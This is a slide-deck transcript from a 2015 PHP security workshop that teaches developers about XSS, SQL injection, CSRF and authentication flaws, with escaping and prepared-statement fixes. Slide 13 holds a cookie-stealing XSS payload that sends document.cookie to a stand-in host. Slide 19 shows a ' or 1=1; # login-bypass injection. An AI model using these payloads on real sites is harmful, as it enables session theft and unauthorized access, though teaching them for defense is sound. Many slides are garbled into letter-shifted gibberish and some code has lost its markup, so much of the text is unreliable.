Upgrade to Pro — share decks privately, control downloads, hide ads and more …

PHP Security Bootcamp

PHP Security Bootcamp

The web is becoming a more and more dangerous place every day. You, as a PHP application developer, need to be armed with the tools and knowledge to make your applications as secure as possible. Come get hands-on training in applying secure design principles, testing code for vulnerabilities and fixing the problems we find together. We'll be using a vulnerable application to illustrate some of the most common vulnerabilities like cross-site scripting, SQL injection and other notables from the OWASP Top 10 list. You'll walk away with a grasp of good secure coding practices and a platform for future experimentation.

At Lone Star PHP 2015

Chris Cornutt

April 18, 2015
Tweet

More Decks by Chris Cornutt

Other Decks in Technology

Transcript

  1. Secure PHP Development
    $ISJT$PSOVUU!FOZHNB

    View Slide

  2. 1)1%FW:FBST
    "QQTFD&OHJOFFS
    IUUQXFCTFDJP
    IUUQTFDVSJOHQIQDPN

    View Slide

  3. Goals
    #BTJDBQQTFDQSJODJQMFT
    7VMOFSBCJMJUJFT&YQMPJUT
    )BOETPOFYQFSJFODF
    5PPMT5FDIOJRVFT

    View Slide

  4. IUUQCJUMZPXBTQUPQ

    View Slide

  5. 5IFSF`T
    OPTVDIUIJOH
    BTTFDVSF

    View Slide

  6. IUUQTHJUIVCDPNQTFDJPOPUDI
    /PUDI"7VMOFSBCMF"QQMJDBUJPO

    View Slide

  7. IUUQTHJUIVCDPNQTFDJPOPUDI
    4FUVQ5JNF
    PSIUUQOPUDITFDVSJOHQIQDPN

    View Slide

  8. View Slide

  9. XSS:
    Cross Site Scripting

    View Slide

  10. *OKFDUJPOPGDPOUFOUJOUPUIFQBHF
    VTVBMMZ+BWBTDSJQU
    SFqFDUFEWTTUPSFE
    QPPSPVUQVUFTDBQJOH

    View Slide

  11. $44
    +BWBTDSJQU
    )5.-
    )5.-"UUSJCVUF
    2VFSZWBMVF
    Context
    style: foo-=$input?>
    var name = “=$input?>”;
    =$input?>
    ”>foo
    $url = “http://foo.com?data=“.$input

    View Slide

  12. Example
    echo “Howdy, my name is “.$_GET[‘name’];
    ?>
    ?name=alert(“xss”)

    View Slide

  13. Example
    <br/>xmlhttp = new XMLHttpRequest();<br/>xmlhttp.open(<br/>'GET',<br/>‘http://leethack.php?cookies=‘+document.cookie,<br/>true);<br/>xmlhttp.send();<br/>
    "TTVNFTDSPTTPSJHJOQPMJDZPG

    View Slide

  14. Your Turn

    View Slide

  15. Prevention #1
    $name = htmlspecialchars(
    $_GET[‘name’], ENT_COMPAT, ‘UTF-8’
    );
    echo “Howdy, my name is “.$name;
    ?>
    /PUF5IJTJTPOMZGPSB)5.-DPOUFYU

    View Slide

  16. Prevention #2
    {{ name|e(‘html’) }}
    {{ name|e(‘html_attr’) }}
    {{ name|e(‘js’) }}
    {{ name|e(‘css’) }}
    /PUF5IJTFYBNQMFSFRVJSFT5XJH

    View Slide

  17. SQLi:
    SQL Injection

    View Slide

  18. *OKFDUJPOTQFDJpDUP42-TUBUFNFOUT
    FYQPTFEBUB
    CZQBTTBVUINFDIBOJTNT
    QPPSJOQVUpMUFSJOH

    View Slide

  19. Example
    $sql = ‘select id
    from users
    where username = “‘.$_POST[‘username’].’”
    and password = “‘.$_POST[‘password’].’”’;
    password=‘ or 1=1; #
    select id
    from users
    where username = “user1”
    and password = “” or 1=1; #

    View Slide

  20. View Slide

  21. View Slide

  22. 1SFQBSFETUBUFNFOUT
    1%0
    .ZTRMJ

    View Slide

  23. Your Turn

    View Slide

  24. Prevention
    $stmt = $dbh->prepare(‘select id from users’
    .’ where username = :user’
    .’ and password = :pass’);
    $stmt->execute(array(
    ‘user’ => $_POST[‘username’],
    ‘pass’ => $_POST[‘password’]
    ));
    $results = $stmt->fetchAll(PDO::FETCH_ASSOC);
    ?>
    /PUF5IJTFYBNQMFSFRVJSFT1%0TVQQPSU

    View Slide

  25. CSRF:
    Cross Site Request
    Forgery

    View Slide

  26. VOWBMJEBUFEGPSNTVCNJTTJPO
    POBMMTUBUFDIBOHFT
    XIBU`TUIFTPVSDF
    TJNQMF
    SBOEPNJ[FE GPSFBDIGPSN

    View Slide

  27. Example





    View Slide

  28. Example




    value=“098f6bcd4621d373cade4e832627b4f6”
    name=“csrf-token”/>

    View Slide

  29. Auth*:
    Authentication &
    Authorization

    View Slide

  30. EJSFDUPCKFDUSFGFSFODF "

    EBUBBDDFTT
    EBOHFSPVTBDUJPOT
    QPPSVTFSNBOBHFNFOU

    View Slide

  31. Your Turn

    View Slide

  32. QMBJOUFYUQBTTXPSET
    OPQBTTXPSEQPMJDZ
    PWFSMZDPNQMFYQBTTXPSET
    QBTTXPSEIJOUT

    View Slide

  33. View Slide

  34. View Slide

  35. But wait, there’s
    more…

    View Slide

  36. 4FDVSJUZ.JTDPOpHVSBUJPO
    4FOTJUJWF%BUB&YQPTVSF
    $PNQPOFOUTXJUI,OPXO7VMOFSBCJMJUJFT
    6OWBMJEBUFE3FEJSFDUTBOE'PSXBSET

    View Slide

  37. 5IBU`TBMMGPMLT
    !FOZHNB
    !TFDVSJOHQIQ
    IUUQTFDVSJOHQIQDPN

    View Slide